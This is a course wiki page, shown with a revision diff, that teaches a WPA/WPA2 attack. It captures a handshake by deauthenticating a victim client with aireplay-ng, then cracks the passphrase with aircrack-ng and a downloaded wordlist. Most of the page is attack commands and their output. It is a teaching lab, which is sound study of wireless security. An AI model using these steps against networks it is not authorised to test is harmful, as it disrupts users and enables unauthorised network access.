Difference between revisions of "WPA/WPA2 PSK deauthentication attack"
Jump to navigation
Jump to search
(→Reset) |
|||
| Line 73: | Line 73: | ||
aircrack-ng -w <passwordlist path> -b <bssd> psk*.cap | aircrack-ng -w <passwordlist path> -b <bssd> psk*.cap | ||
=== Reset | === Reset network configuration === | ||
do not forget to turn off monitor mode and restart network manager | do not forget to turn off monitor mode and restart network manager | ||
| Line 83: | Line 83: | ||
service network-manager restart | service network-manager restart | ||
== Used Hardware == | == Used Hardware == | ||
Revision as of 18:58, 17 February 2020
Summary
How to sniff a WPA/WPA2 handshake using a deauthentication attack and use aircrack-ng to crack the password.
Requirements and Tools
- Operating system: Ubuntu 18.04 bionic amd64
- Aircrack-ng
Description
Put your interface in monitor mode
- Use airmon-ng to put interface in monitor mode
airmon-ng
PHY Interface Driver Chipset
phy0 wlan0 iwlwifi Intel Corporation Wireless 7260 (rev 83)
- First we need to set interface in monitor mode `iw wlan0 del` and execute the command :
airmon-ng
Found phy0 with no interfaces assigned, would you like to assign one to it? [y/n] y
PHY Interface Driver Chipset
phy0 wlan0mon iwlwifi Intel Corporation Wireless 7260 (rev 83)
- Kill all processes which use physical device
airmon-ng check kill
Killing these processes:
PID Name
895 wpa_supplican
- Start in monitor mode
airmon-ng start wlan0mon 9
Check needed MAC addresses
- using wireshark or airodump-ng
airodump-ng wlan0mon
- You will need:
- BSSID (MAC address of access point): <bssid>
- Access point channel: <channel>
- MAC address of a victim, wireless client using WPA2
Capture handshake
- Get handshake or connected station
airodump-ng -c <channel> --bssid <bssid> -w psk wlan0mon
if no there is no handshake captured you need to get the MAC address of a victim and deauthenticate
- Deauthenticate using airreplay-ng
aireplay-ng -0 1 -a <bssid> -c <victim mac address> wlan0mon
-0 means deauthentication 1 number of deauthentication frames sent -a bssid mac address -c victim mac address to deauthenticate
- examine handshake with wireshark filter eapol messages
Crack with aircrack-ng
- download a password list from somewhere https://github.com/danielmiessler/SecLists/blob/master/Passwords/ and issue following aircrack-ng command to crack the password
aircrack-ng -w <passwordlist path> -b <bssd> psk*.cap
Reset network configuration
do not forget to turn off monitor mode and restart network manager
- Stop monitor mode
airmon-ng stop wlan0mon
- Restart network manager for internet access
service network-manager restart
Used Hardware
Notebook with Wifi interface card
Courses
- CCST 21.06.2019 (2019)